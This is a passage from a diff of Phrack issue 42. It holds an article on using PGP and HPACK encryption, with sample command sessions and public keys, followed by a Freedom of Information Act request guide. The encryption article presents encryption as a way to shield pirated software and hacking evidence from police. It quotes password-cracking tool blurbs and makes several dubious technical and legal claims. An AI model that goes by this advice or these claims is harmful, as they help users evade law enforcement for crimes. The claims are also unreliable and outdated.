+                              --------------------
+
+        This isn't exactly the typical topic discussed by me in Phrack.
+However, the importance of knowing encryption is necessary when dealing with
+any quasi-legal computer activity.  I was planning on starting my series on
+hacking Novell Networks (so non-Internet users can have something to do), but
+recent events have caused me to change my mind and, instead of showing people
+how to get into more trouble (well, okay, there is plenty of that in this file
+too, since you're going to be working with contraband software), I've opted
+instead to show people how to protect themselves from the long arm of the Law.
+
+        Why all this concern?
+
+        Relatively recently, The Masters of Deception (MoD) were raided by
+various federal agencies and were accused of several crimes.  The crimes they
+did commit will doubtlessly cause more mandates, making the already
+too-outrageous penalties even worse.
+
+        "So?" you might ask.  The MoD weren't exactly friends of mine.  In fact,
+quite the contrary.  But unlike many of the hackers whom I dealt with in the
+"final days" prior to their arrest, I bitterly protested any action against the
+MoD.  Admittedly, I followed the episode from the beginning to the end, and the
+moral arguments were enough to rip the "Hacker World" to pieces.  But these
+moral issues are done, the past behind most of us.  It is now time to examine
+the aftermath of the bust.
+
+        According to the officials in charge of the investigation against MoD
+members, telephone taps were used to gain evidence against members
+successfully.  All data going in and out of their house was monitored and all
+voice communications were monitored, especially between members.
+
+        So, how do you make a line secure?  The party line answer is use of
+effective encryption methods.
+
+        Federal investigative agencies are currently pushing for more
+technological research into the issue of computer security.  All of the popular
+techniques which are being used by hackers today are being used by the
+government's R&D departments.
+
+        Over the course of the last 5 years, I've watched as the U.S.
+Government went from a task force of nearly nil all the way to a powerful
+marauder.  Their mission?  Unclear.  Regardless, the research being
+accomplished by federally-funded projects dealing with the issues of computer
+security are escalating.  I've personally joined and examined many such
+conferences and have carefully examined the issues.  Many of these issues will
+become future Phrack articles which I'll write.  Others, such as limited-life
+semiconductors and deliberate telephone line noise sabotage caused by ACK
+packet detections in order to drive telecommunication costs higher, are sadly
+unpreventable problems of the future which won't be cured by simple awareness
+of the problem.
+
+        They have different names -- Computer Emergency Response Team (CERT),
+Computer Assisted Security Investigative Analysis Tool (FBI's CASIAT), the
+Secret Service's Computer Fraud Division, or the National Computer Security
+Center (NSA's NCSC).  Scores of other groups exist for every network, even
+every operating system.  Their goal isn't necessarily to catch hackers; their
+goal is to acquire information about the act of hacking itself until it is no
+longer is a problem.  Encryption stands in the way.
+
+        Computer Security is literally so VAST a concept that, once a person
+awakens to low-level computer mechanics, it becomes nearly impossible to
+prevent that person from gaining unauthorized access to machines.  This is
+somewhat contradictory to the "it's all social engineering" concept which we
+have been hearing about on Nightline and in the papers.  If you can't snag them
+one way though, you can get them another -- the fact is that computers are
+still too damn vulnerable these days to traditional hacking techniques.
+
+        Because of the ease of breaking through security, it becomes very
+difficult to actually create an effective way to protect yourself from any form
+of computer hacking.  Look at piracy:  they've tried every trick in the book to
+protect software and, so far, the only success they have had was writing
+software that sucked so much nobody wanted a copy.
+
+        Furthermore, totally non-CPU related attacks are taking place.  The
+passing of Anti-TEMPEST Protection Laws which prevent homes from owning
+computers that don't give off RF emissions has made it possible for any Joe
+with a few semesters of electrical engineering knowledge to rig together a
+device that can read what's on your computer monitor.
+
+     Therefore:
+
+     Q:  How does a person protect their own computer from getting hacked?
+
+     A:  You pretty much can't.
+
+        I've memorized so many ways to bypass computer security that I can
+rattle them off in pyramid levels.  If a computer is not even connected to a
+network or phone line, people can watch every keystroke typed and everything
+displayed on the screen.
+
+        Why aren't the Fedz using these techniques RIGHT NOW?
+
+        I can't say they are not.  However, a little research into TEMPEST
+technology resulted in a pretty blunt fact:
+
+        There are too many computer components to scan accurately.  Not the
+monitor, oh no!  You're pretty much fucked there.  But accessories for input
+and output, such as printers, sound cards, scanners, disk drives, and so
+forth...the possibility of parallel CPU TEMPEST technology exists, but there are
+more CPU types than any mobile unit could possibly use accurately.
+
+        Keyboards are currently manufactured by IBM, Compaq, Dell, Northgate,
+Mitsuma (bleah), Fujitsu, Gateway, Focus, Chichony, Omni, Tandy, Apple, Sun,
+Packard-Bell (may they rot in hell), Next, Prime, Digital, Unisys, Sony,
+Hewlett-Packard, AT&T, and a scattering of hundreds of lesser companies.  Each
+of these keyboards have custom models, programmable models, 100+ key and < 100
+key models, different connectors, different interpreters, and different levels
+of cable shielding.
+
+        For the IBM compatible alone, patents are owned on multiple keyboard
+pin connectors, such as those for OS/2 and Tandy, as well as the fact that the
+ISA chipsets are nearly as diverse as the hundreds of manufacturers of
+motherboards.  Because of lowest-bid practices, there can be no certainty of
+any particular connection -- especially when you are trying to monitor a
+computer you've never actually seen!
+
+        In short -- it costs too much for the TEMPEST device to be mobile and
+to be able to detect keystrokes from a "standard" keyboard, mostly because
+keyboards aren't "standard" enough!  In fact, the only real standard which I
+can tell exists on regular computers is the fact that monitors still use good
+old CRT technology.
+
+        Arguments against this include the fact that most of the available PC
+computers use standard DIN connectors which means that MOST of the keyboards
+could be examined.  Furthermore, these keyboards are traditionally serial
+connections using highly vulnerable wire (see Appendix B).
+
+        Once again, I raise the defense that keyboard cables are traditionally
+the most heavily shielded (mine is nearly 1/4 inch thick) and therefore falls
+back on the question of how accurate a TEMPEST device which is portable can be,
+and if it is cost effective enough to use against hackers.  Further viewpoints
+and TEMPEST overview can be seen in Appendix B.
+
+        As a result, we have opened up the possibility for protection from
+outside interference for our computer systems.  Because any DECENT encryption
+program doesn't echo the password to your screen, a typical encryption program
+could provide reasonable security to your machine.  How reasonable?
+
+        If you have 9 pirated programs installed on your computer at a given
+time and you were raided by some law enforcement holes, you would not be
+labeled at a felon.  Instead, it wouldn't even be worth their time to even raid
+you.  If you have 9 pirated programs installed on your computer, had 200
+pirated programs encrypted in a disk box, and you were raided, you would have
+to be charged with possession of 9 pirated programs (unless you did something
+stupid, like write "Pirated Ultima" or something on the label).
+
+        We all suspected encryption was the right thing to do, but what about
+encryption itself?  How secure IS encryption?
+
+        If you think that the world of the Hackers is deeply shrouded with
+extreme prejudice, I bet you can't wait to talk with crypto-analysts.  These
+people are traditionally the biggest bunch of holes I've ever laid eyes on.  In
+their mind, people have been debating the concepts of encryption since the dawn
+of time, and if you come up with a totally new method of data encryption, -YOU
+ARE INSULTING EVERYONE WHO HAS EVER DONE ENCRYPTION-, mostly by saying "Oh, I
+just came up with this idea for an encryption which might be the best one yet"
+when people have dedicated all their lives to designing and breaking encryption
+techniques -- so what makes you think you're so fucking bright?
+
+        Anyway, crypto-(anal)ysts tend to take most comments as veiled insults,
+and are easily terribly offended.  Well, make no mistake, if I wanted to insult
+these people, I'd do it.  I've already done it.  I'll continue to do it.  And I
+won't thinly veil it with good manners, either.
+
+        The field of Crypto-analysis has traditionally had a mathematical
+emphasis.  The Beal Cipher and the German Enigma Cipher are some of the more
+popular views of the field.  Ever since World War 2, people have spent time
+researching how technology was going to affect the future of data encryption.
+
+        If the United States went to war with some other country, they'd have a
+strong advantage if they knew the orders of the opposing side before they were
+carried out.  Using spies and wire taps, they can gain encrypted data referred
+to as Ciphertext.  They hand the information over to groups that deal with
+encryption such as the NSA and the CIA, and they attempt to decode the
+information before the encrypted information is too old to be of any use.
+
+        The future of Computer Criminology rests in the same ways.  The
+deadline on white collar crimes is defaulted to about 3-4 years, which is
+called the Statute of Limitations.  Once a file is obtained which is encrypted,
+it becomes a task to decrypt it within the statute's time.
+
+        As most crypto-analysts would agree, the cost in man-hours as well as
+supercomputer time would make it unfeasible to enforce brute force decryption
+techniques of random encryption methods.  As a result of this, government
+regulation stepped in.
+
+        The National Security Agency (referred to as "Spooks" by the relatively
+famous tormenter of KGB-paid-off hackers, Cliff Stoll, which is probably the
+only thing he's ever said which makes me think he could be a real human being)
+released the DES -- Data Encryption Standard.  This encryption method was
+basically solid and took a long time to crack, which was also the Catch-22.
+
+        DES wasn't uncrackable, it was just that it took "an unreasonable
+length of time to crack."  The attack against the word "unreasonable" keeps
+getting stronger and stronger.  While DES originated on Honeywell and DEC PDPs,
+it was rumored that they'd networked enough computers together to break a
+typical DES encrypted file.  Now that we have better computers and the cost
+requirements for high-speed workstations are even less, I believe that even if
+they overestimated "unreasonable" a hundredfold, they'd be in the "reasonable"
+levels now.
+
+To explain how fast DES runs these days...
+
+        I personally wrote a password cracker for DES which was arguably the
+very first true high-speed cracker.  It used the German "Ultra-Fast Crypt"
+version of the DES algorithm, which happened to contain a static variable used
+to hold part of the previous attempt at encrypting the password, called the
+salt.  By making sure the system wouldn't resalt on every password attempt, I
+was able to guess passwords out of a dictionary at the rate of 400+ words per
+second on a 386-25 (other methods at that time were going at about 30 per
+second).  As I understand it now, levels at 500+ for the same CPU have been
+achieved.
+
+        Now this means I can go through an entire dictionary in about five
+minutes on a DES-encrypted segment.  The NSA has REAL cash and some of the
+finest mathematicians in the world, so if they wanted to gain some really
+decent speed on encryption, DES fits the ideal for parallel programming.
+Splitting a DES segment across a hundred CPUs, each relatively modern, they
+could crank out terraflops of speed.  They'd probably be able to crack the code
+within a few days if they wanted to.
+
+        Ten years from now, they could do it in a few seconds.
+
+        Of course, the proper way to circumnavigate DES encryption is to locate
+and discover a more reliable, less popular method.  Because the U.S. Government
+regulates it, it doesn't mean it's the best.  In fact, it means it's the
+fucking lamest thing they could sweeten up and hope the public swallows it!
+The last attempt the NSA made at regulating a standard dealing with encryption,
+they got roasted.
+
+        I'm somewhat convinced that the NSA is against personal security, and
+from all the press they give, they don't WANT anyone to have personal security.
+Neither does the Media for that matter.
+
+        Because of lamers in the "Biblical Injustice Grievance Group of
+Opposing Terrible Sacrilege" (or BIGGOTS) who think that if you violate a LAW
+you're going to Hell (see APPENDIX C for my viewpoint of these people) and who
+will have convinced Congress to pass ease-of-use wire taps on telephone lines
+and networks so that they can monitor casual connections without search
+warrants, encryption will be mandatory if you want any privacy at all.
+
+        And to quote Phil Zimmermann, "If privacy is outlawed, only the
+outlaws will have privacy."
+
+        Therefore, encryption methods that we must use should be gathered into
+very solid categories which do NOT have endorsement of the NSA and also have
+usefulness in technique.
+
+HOW TO USE DECENT ENCRYPTION:
+
+(First, go to APPENDIX D, and get yourself a copy of PGP, latest version.)
+
+        First of all, PGP is contraband software, presumably illegal to use in
+the United States because of a patent infringement it allegedly carries.  The
+patent infringement is the usage of a variant of the RSA encryption algorithm.
+Can you patent an algorithm?  By definition, you cannot patent an idea, just a
+product -- like source code.  Yet, the patent exists to be true until proven
+false.  More examples of how people in the crypto-analyst field can be assholes.
+
+        Anyway, Phil's Pretty Good Software, creators of PGP, were sued and all
+rights to PGP were forfeited in the United States of America.  Here comes the
+violation of the SECOND law, illegal exportation of a data encryption outside
+of the United States of America.  Phil distributed his encryption techniques
+outside the USA, which is against the law as well.  Even though Mr. Zimmermann
+doesn't do any work with PGP, because he freely gave his source code to others,
+people in countries besides the United States are constantly updating and
+improving the PGP package.
+
+        PGP handles two very important methods of encryption -- conventional
+and public key.  These are both very important to understand because they
+protect against completely different things.
+
+                            -----------------------
+                            CONVENTIONAL ENCRYPTION
+                            -----------------------
+
+        Conventional encryption techniques are easiest to understand.  You
+supply a password and the password you enter encrypts a file or some other sort
+of data.  By re-entering the password, it allows you to recreate the original
+data.
+
+        Simple enough concept, just don't give the password to someone you
+don't trust.  If you give the password to the wrong person, your whole business
+is in jeopardy.  Of course, that goes with just about anything you consider
+important.
+
+        There are doubtlessly many "secure enough" ciphers which exist right
+now.  Unfortunately, the availability of these methods are somewhat slim
+because of exportation laws.  The "major" encryption programs which I believe
+are worth talking about here are maintained by people foreign to the USA.
+
+        The two methods of "conventional" encryption are at least not DES,
+which qualifies them as okay in my book.  This doesn't mean they are impossible
+to break, but they don't have certain DES limitations which I know exist, such
+as 8 character password maximum.  The methods are:  MDC, as available in the
+package HPACK; and IDEA, as available in Pretty Good Privacy.
+
+        Once you've installed PGP, we can start by practicing encrypting
+some typical files on your PC.  To conventionally encrypt your AUTOEXEC.BAT
+file (it won't delete the file after encryption), use the following command:
+
+C:\> pgp -c autoexec.bat
+Pretty Good Privacy 2.1 - Public-key encryption for the masses.
+(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
+Date: 1993/01/19 03:06 GMT
+
+You need a pass phrase to encrypt the file.
+Enter pass phrase:                                      { Password not echoed }
+Enter same pass phrase again: Just a moment....
+Ciphertext file: autoexec.pgp
+
+C:\> dir
+
+ Volume in drive C is RACK'S
+ Directory of  c:\autoexec.pgp
+
+autoexec.pgp      330 1-18-93  21:05
+
+        330 bytes in 1 file(s)          8,192 bytes allocated
+  52,527,104 bytes free
+
+        PGP will compress the file before encrypting it.  I'd say this is a
+vulnerability to the encryption on the basis that the file contains a ZIP file
+signature which could conceivably make the overall encryption less secure.
+Although no reports have been made of someone breaking PGP this way, I'd feel
+more comfortable with the ZIP features turned off.  This is somewhat contrary
+to the fact that redundancy checking is another way of breaking ciphertext.
+However, it isn't as reliable as checking a ZIP signature.
+
+        Although PGP will doubtlessly become the more popular of the two
+programs, HPACK's encryption "strength" is that by being less popular, it will
+probably not be as heavily researched as PGP's methods will be.  Of course, by
+following PGP, new methods of encryption will doubtlessly be added as the
+program is improved.
+
+        Here is how you'd go about encrypting an entire file using the HPACK
+program using the MDC "conventional" encryption:
+
+C:\> hpack A -C secret.hpk secret.txt
+HPACK - The multi-system archiver Version 0.78a0 (shareware version)
+For Amiga, Archimedes, Macintosh, MSDOS, OS/2, and UNIX
+Copyright (c) Peter Gutmann 1989 - 1992.  Release date: 1 Sept 1992
+
+Archive is 'SECRET.HPK'
+
+Please enter password (8..80 characters):
+Reenter password to confirm:
+Adding SECRET  .TXT
+
+Done
+
+        Anyway, I don't personally think HPACK will ever become truly popular
+for any reason besides its encryption capabilities.  ZIP has been ported to an
+amazing number of platforms, in which lies ZIP's encryption weakness.  If you
+think ZIP is safe, remember that you need to prevent the possibility of four
+years of attempted password cracking in order to beat the Statutes of
+Limitations:
+
+        Here is the introduction to ZIPCRACK, and what it had to say about how
+easy it is to break through this barrier:
+
+(Taken from ZIPCRACK.DOC)
+-----
+     ZIPCRACK is a program designed to demonstrate how easy it is to find
+passwords on files created with PKZIP.  The approach used is a fast,
+brute-force attack, capable of scanning thousands of passwords per second
+(5-6000 on an 80386-33).  While there is currently no known way to decrypt
+PKZIP's files without first locating the correct password, the probability that
+a particular ZIP's password can be found in a billion-word search (which takes
+about a day on a fast '486) is high enough that anyone using the encryption
+included in PKZIP 1.10 should be cautious (note:  as of this writing, PKZIP
+version 2.00 has not been released, so it is not yet known whether future
+versions of PKZIP will use an improved encryption algorithm).  The author's
+primary purpose in releasing this program is to encourage improvements in ZIP
+security.  The intended goal is NOT to make it easy for every computer user to
+break into any ZIP, so no effort has been made to make the program
+user-friendly.
+----- End Blurb
+
+        Likewise, WordPerfect is even more vulnerable.  I've caught a copy of
+WordPerfect Crack out on the Internet and here is what it has to say about
+WordPerfect's impossible-to-break methods:
+
+(Taken from WPCRACK.DOC:)
+-----
+WordPerfect's manual claims that "You can protect or lock your documents with a
+password so that no one will be able to retrieve or print the file without
+knowing the password - not even you," and "If you forget the password, there is
+absolutely no way to retrieve the document."  [1]
+
+Pretty impressive!  Actually, you could crack the password of a Word Perfect
+5.x file on a 8 1/2" x 11" sheet of paper, it's so simple.  If you are counting
+on your files being safe, they are NOT.  Bennet [2] originally discovered how
+the file was encrypted, and Bergen and Caelli [3] determined further
+information regarding version 5.x.  I have taken these papers, extended them,
+and written some programs to extract the password from the file.
+----- End Blurb
+
+                             ---------------------
+                             PUBLIC KEY ENCRYPTION
+                             ---------------------
+
+        Back to the Masters of Deception analogy -- they were telephone
+tapped.  Conventional encryption is good for home use, because only one person
+could possibly know the password.  But what happens when you want to transmit
+the encrypted data by telephone?  If the Secret Service is listening in on your
+phone calls, you can't tell the password to the person that you want to send
+the encrypted information to.  The SS will grab the password every single time.
+
+        Enter Public-Key encryption!   The concepts behind Public-Key are very
+in-depth compared to conventional encryption.  The idea here is that passwords
+are not exchanged; instead a "key" which tells HOW to encrypt the file for the
+other person is given to them.  This is called the Public Key.
+
+        You retain the PRIVATE key and the PASSWORD.  They tell you how to
+decrypt the file that someone sent you.  There is no "straight" path between
+the Public Key and the Private Key, so just because someone HAS the public key,
+it doesn't mean they can produce either your Secret Key or Password.  All it
+means is that if they encrypt the file using the Public Key, you will be able
+to decrypt it.  Furthermore, because of one-way encryption methods, the output
+your Public Key produces is original each time, and therefore, you can't
+decrypt the information you encrypted with the Public Key -- even if you
+encrypted it yourself!
+
+        Therefore, you can freely give out your own Public Key to anyone you
+want, and any information you receive, tapped or not, won't make a difference.
+As a result, you can trade anything you want and not worry about telephone
+taps!  This technique supposedly is being used to defend the United States'
+Nuclear Arsenal, if you disbelieve this is secure.
+
+        I've actually talked with some of the makers of the RSA "Public-Key"
+algorithm, and, albeit they are quite brilliant individuals, I'm somewhat
+miffed at their lack of enthusiasm for aiding the public in getting a hold of
+tools to use Public Key.  As a result, they are about to get railroaded by
+people choosing to use PGP in preference to squat.
+
+        Okay, maybe they don't have "squat" available.  In fact, they have a
+totally free package with source code available to the USA public (no
+exportation of code) which people can use called RSAREF.  Appendix E explains
+more about why I'm not suggesting you use this package, and also how to obtain
+it so you can see for yourself.
+
+        Now that we know the basic concepts of Public-Key, let's go ahead and
+create the basics for effective tap-proof communications.
+
+Generation of your own secret key (comments in {}s):
+
+C:\> pgp -kg               {  Command used to activate PGP for key generation }
+Pretty Good Privacy 2.1 - Public-key encryption for the masses.
+(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
+Date: 1993/01/18 19:53 GMT
+
+Pick your RSA key size:
+        1)       384 bits- Casual grade, fast but less secure
+        2)       512 bits- Commercial grade, medium speed, good security
+        3)      1024 bits- Military grade, very slow, highest security
+Choose 1, 2, or 3, or enter desired number of bits: 3  {DAMN STRAIGHT MILITARY}
+
+Generating an RSA key with a 1024-bit modulus...
+You need a user ID for your public key.  The desired form for this
+user ID is your name, followed by your E-mail address enclosed in
+<angle brackets>, if you have an E-mail address.
+For example:  John Q. Smith <12345.6789@compuserve.com>
+
+Enter a user ID for your public key:
+The Racketeer <rack@lycaeum.hfc.com>
+
+You need a pass phrase to protect your RSA secret key.
+Your pass phrase can be any sentence or phrase and may have many
+words, spaces, punctuation, or any other printable characters.
+Enter pass phrase:                                     { Not echoed to screen }
+Enter same pass phrase again:                          {  "    "    "    "    }
+Note that key generation is a VERY lengthy process.
+
+We need to generate 105 random bytes.  This is done by measuring the
+time intervals between your keystrokes.  Please enter some text on your
+keyboard, at least 210 nonrepeating keystrokes, until you hear the beep:
+1 .*                                                             { decrements }
+-Enough, thank you.
+...................................................++++ ........++++
+Key generation completed.
+
+        It took a 33-386DX a grand total of about 10 minutes to make the key.
+Now that it has been generated, it has been placed in your key ring.  We can
+examine the key ring using the following command:
+
+C:\> pgp -kv
+Pretty Good Privacy 2.1 - Public-key encryption for the masses.
+(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
+Date: 1993/01/18 20:19 GMT
+
+Key ring: 'c:\pgp\pubring.pgp'
+Type bits/keyID   Date       User ID
+pub  1024/7C8C3D  1993/01/18 The Racketeer <rack@lycaeum.hfc.com>
+1 key(s) examined.
+
+        We've now got a viable keyring with your own keys.  Now, you need to
+extract your Public Key so that you can have other people encrypt shit and have
+it sent to you.  In order to do this, you need to be able to mail it to them.
+Therefore, you need to extract it in ASCII format.  This is done by the
+following:
+
+C:\> pgp -kxa "The Racketeer <rack@lycaeum.hfc.com>"
+Pretty Good Privacy 2.1 - Public-key encryption for the masses
+(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
+Date: 1993/01/18 20:56 GMT
+
+Extracting from key ring:  'c:\pgp\pubring.pgp', userid "The Racketeer
+<rack@lycaeum.hfc.com>".
+
+Key for user ID: The Racketeer <rack@lycaeum.hfc.com>
+1024-bit key, Key ID 0C975F, created 1993/01/18
+
+Extract the above key into which file? rackkey
+
+Transport armor file: rackkey.asc
+
+Key extracted to file 'rackkey.asc'.
+
+        Done.  The end result of the key is a file which contains:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.1
+
+mQCNAisuyi4AAAEEAN+cY6nUU+VIhYOqBfcc12rEMph+A7iadUi8xQJ00ANvp/iF
++ugZ+GP2ZnzA0fob9cG/MVbh+iiz3g+nbS+ZljD2uK4VyxZfu5alsbCBFbJ6Oa8K
+/c/e19lzaksSlTcqTMQEae60JUkrHWpnxQMM3IqSnh3D+SbsmLBs4pFrfIw9AAUR
+tCRUaGUgUmFja2V0ZWVyIDxyYWNrQGx5Y2FldW0uaGZjLmNvbT4=
+=6rFE
+-----END PGP PUBLIC KEY BLOCK-----
+
+        This can be tagged to the bottom of whatever E-Mail message you want to
+send or whatever.  This key can added to someone else's public key ring and
+thereby used to encrypt information so that it can be sent to you.  Most people
+who use this on USENET add it onto their signature files so that it is
+automatically posted on their messages.
+
+        Let's assume someone else wanted to communicate with you.  As a result,
+they sent you their own Public Key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.1
+
+mQA9AitgcOsAAAEBgMlGLWl8rub0Ulzv3wpxI5OFLRkx3UcGCGsi/y/Qg7nR8dwI
+owUy65l9XZsp0MUnFQAFEbQlT25lIER1bWIgUHVkIDwxRHVtUHVkQG1haWxydXMu
+Yml0bmV0Pg==
+=FZBm
+-----END PGP PUBLIC KEY BLOCK-----
+
+        Notice this guy, Mr. One Dumb Pud, used a smaller key size than you
+did.  This shouldn't make any difference because PGP detects this
+automatically.  Let's now add the schlep onto your key ring.
+
+C:\> pgp -ka dumbpud.asc
+Pretty Good Privacy 2.1 - Public-key encryption for the masses.
+(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
+Date: 1993/01/22 22:17 GMT
+
+Key ring: 'c:\pgp\pubring.$01'
+Type bits/keyID   Date       User ID
+pub   384/C52715  1993/01/22 One Dumb Pud <1DumPud@mailrus.bitnet>
+
+New key ID: C52715
+
+Keyfile contains:
+   1 new key(s)
+Adding key ID C52715 from file 'dumbpud.asc' to key ring 'c:\pgp\pubring.pgp'.
+
+Key for user ID: One Dumb Pud <1DumPud@mailrus.bitnet>
+384-bit key, Key ID C52715, crated 1993/01/22
+This key/userID associate is not certified.
+
+Do you want to certify this key yourself (y/N)?  n {We'll deal with this later}
+
+        Okay, now we have the guy on our key ring.  Let's go ahead and encrypt
+a file for the guy.  How about having the honor of an unedited copy of this
+file?
+
+C:\> pgp -e encrypt One                     {PGP has automatic name completion}
+Pretty Good Privacy 2.1 - Public-key encryption for the masses.
+(c) 1990-1992 Philip Zimmermann, Phil's Pretty Good Software. 6 Dec 92
+Date: 1993/01/22 22:24 GMT
+
+
+Recipient's public key will be used to encrypt.
+Key for user ID: One Dumb Pud <1DumPud@mailrus.bitnet>
+384-bit key, Key ID C52715, created 1993/01/22
+
+WARNING:  Because this public key is not certified with a trusted
+signature, it is not known with high confidence that this public key
+actually belongs to: "One Dumb Pud <1DumPud@mailrus.bitnet>".
+
+Are you sure you want to use this public key (y/N)? y
+------------------------------------------------------------------------------
diff --git a/phrack42/12.txt b/phrack42/12.txt
new file mode 100644
index 0000000..3b031c2
--- /dev/null
+++ b/phrack42/12.txt
@@ -0,0 +1,989 @@
+                              ==Phrack Magazine==
+
+                  Volume Four, Issue Forty-Two, File 12 of 14
+
+
+                  %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
+                  | The Freedom of Information Act and You  |
+                  |                                         |
+                  |                   by                    |
+                  |               Vince Niel                |
+                  |                                         |
+                  %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
+
+
+    As we all know of our United State government in the modern era, Big
+Brother is watching.  It is naive to think that we do not live in a world
+similar to the one described is George Orwell's novel, 1984.  The government
+keeps tabs on everything we do.  The federal government has thousands of
+documents concerning individual citizens.  For example:
+
+If you have worked for a federal agency or government contractor or have been
+a member of any branch of the armed services, the federal government has a
+file on you.
+
+If you have participated in any federally financed project, some agency
+probably has a record of it.
+
+If you have been arrested by local, state or federal authorities and your
+fingerprints were taken, the FBI maintains a record of you and that arrest.
+
+If you have applied for or received a student loan or grant certified by the
+government, the Department of Health, Education, and Welfare has recorded the
+information.
+
+If you have applied for or been investigated for a security clearance for any
+reason, the Department of Defense has a record of you.
+
+    And these records are not just records of application.  Take for example
+the FBI.  Once you commit a crime, they are watching you.  They update your
+file every time there is a major occurrence in your life i.e. marriage,
+hospitalization, joining the military, committing another crime, etc.  If they
+find the least likelihood of suspicion, they investigate you in depth to add
+even more to your file.  People do not even realize how large their FBI file
+is.
+
+    If you were ever on a pirate board that got busted, and you had your info
+on there, all the users' info on the bulletin board is transferred to the
+federal government.  There a file is opened up for each individual user.  And
+if you ever get in trouble with the law, that file will be opened up and used
+against you if necessary.  Before I continue, I would like to site an example
+of a man who ordered his file from the army.  This file was created when he
+applied for a security clearance with the military years before.  In it said:
+
+...  He owed 50 cents to his high school for not returning his locker key.
+...  He dated 2 or 3 times a week, and was not intimate with his dates.
+...  He was irresponsible because he owed a $5 jaywalking ticket in Seattle.
+
+    So what can you do about this big bureaucratic machine we call our
+government?  Simple, fight back!  The Freedom of Information Act (FOIA as it
+will be referred to) was passed and allows you to obtain your personal records
+from any governmental agency.  A typeup of most of the agencies plus the
+actual act can be found at the end of this file.
+
+    There are restrictions to the act, but it can be quite useful to any
+individual who has had run-ins with the law or who just wants to know what the
+federal government has on him.  You can even go to court against the
+government if a document is denied to you and you think you deserve to see it.
+The act is not widely know, and for good reason.  The government doesn't want
+you to know what they are doing.  But alas, the information will be set free,
+the people have a right to know!
+
+    And don't think that the only interesting documents are the ones from the
+FBI and CIA.  Fascinating documents can be gotten from the IRS, Department of
+Health, Department of Schools, Federal Traffic Administration, HUD, National
+Credit Union, with information you will never believe people who actually
+store about you.
+
+
+    The Specifics of Asking For Your Personal File From a Particular Agency
+    -----------------------------------------------------------------------
+
+    First of all, I would like to bring up a major misconception people make.
+Most people assume that if you ask for your file from the FBI, and there isn't
+a file on you, one will be created for you.  That is an untrue and extremely
+paranoid statement.  The government has better things to do then open up files
+on curious citizens.  And even if by some remote chance they do open up a file
+for you, who cares?  They have a files on millions of people, its not like it
+will hinder you in life.  Just be careful out there, that is all I can say.
+
+    The most important thing that can be done when asking for information from
+a governmental agency under the FOIA is to make it as brief, concise, and
+specific as possible.  In this way, you will get your information, or refusal
+as soon as possible, and you will also curb copying fees (which will be
+discussed later).  First you have to find the agency that concerns you.  If
+you are not sure which agency to apply to, send your letter to more than one.
+There will be a list of agencies at the end of this file, but a complete list
+of agencies can be found in the United States Government Manual.  This can be
+found at any library.
+
+    The request should be addressed to the agency's FOIA officer or to the
+head of the specific agency.  Most agencies have a secretary to deal with all
+the FOIA applications.  The smaller agencies, which you probably will not be
+concerned with, might not have an officer.  On the bottom left hand corner of
+the envelope "Freedom of Information Act Request" should be printed legibly.
+This guarantees that your letter won't get caught in the paperwork shuffle.
+
+    All agencies has FOIA regulation that you should look at.  They do not
+want to send out 'sensitive' documents and whatnot.  These regulations also
+describe the request process in detail.  Here you can also find out what
+specific document you are looking for, reducing fees from the agency.  These
+regulations can be found in "The Code of Federal Regulations", which can also
+be found at your local library.
+
+    Most agencies require that you get your letter 'notarized' or they won't
+even look at it.  This prevents you from impersonating someone else and
+getting their file.  To get your letter notarized, all you have to do is go to
+your local bank.  Show some proof that the person signing the letter is you
+(with an id or something) and they will notarize it.  Now the government has
+no excuse for not taking your letter.
+There are four parts to an FOIA request letter:
+
+    1) Request being made under the FOIA.
+    2) Records that are sought, as specifically as possible.
+    3) Name and address of the person requesting the information.  Telephone
+       number is not necessary, but you will find out about the outcome of
+       your request much quicker.
+    4) How much money you are willing to spend for the document (explained
+       later).
+
+Here is a sample letter, just fill in your information:
+
+-----------------------------------------------------------------------------
+
+Agency Head [or Freedom of Information Act Officer]
+Name of Agency
+Address of Agency
+City, State, Zip Code
+
+Re: Freedom of Information Act Request
+
+    I request a copy of the following documents [or documents containing the
+following information if you do not know the specific name of the document] be
+provided for me: [identify the documents as accurately as possible]
+
+    In order to help determine my status to assess fees, you should know that
+I am an individual seeking information for personal use and not for commercial
+use.  [always, always say you are an individual.  That way, you will not have
+to pay extra fees because you are part of the media or a commercial endeavor.]
+
+    [Optional] I am willing to pay fees for this request up to a maximum of
+$__.  If you estimate the fees will exceed this limit, please inform me first.
+
+    [Optional] I request a waiver of all fees for this request.  Disclosure of
+the requested information to me is in the public interest because it is likely
+to contribute significantly to public understanding of the operations or
+activities  of the government and is not primarily in my commercial interest
+[include specific information].
+
+    Thank you for your consideration of this request.
+
+                    Sincerely,
+
+                    Name
+                    Address
+                    City, State, Zip Code
+                    Telephone Number [Optional]
+-----------------------------------------------------------------------------
+
+Some of the things in the letter may not be understood at first, but I will
+get to them.
+
+
+Money:
+
+    As you might have guessed, getting information under the FOIA is not free,
+but it can be cheapened if you play your cards right.  As specified in the
+letter, always say that you are an individual seeking information not for
+commercial purposes.  Review is the process of going through documents and
+checking if they can be sent to you or not.  Under the law, if you are a
+private individual and are not requesting information for commercial purposes,
+you cannot be charged with review fees!
+
+    All agencies have set fees for copying a document.  Fees can also be taken
+for searching for a document.  If you are an individual, you will be charged
+the least amount of money.  Of course, if you have no idea in hell what the
+name of the document is, and you are stabbing in the dark it is a good idea to
+write in a set amount you are willing to spend.  When the amount is reached,
+you will be notified.  This is in the letter above.
+
+    You don't want to be jacked for a bill of 150 bucks if you send them a
+letter 'just send me everything you got on me'.  Even if you have no idea what
+they have, you can say 'please send me all the dossiers, legal documents, and
+records you have under my name'.  Remember, the government likes bureaucratic
+bullshit.  If you do not phrase you letter right, they will nail you on it.  A
+lot of agencies will waive the cost of processing if it is under $3, and even
+if you receive a bill, it should not exceed 5-10 dollars.
+
+    If you can somehow prove that by accessing this information, it will help
+the general public understand how the government works, you can waive the fee
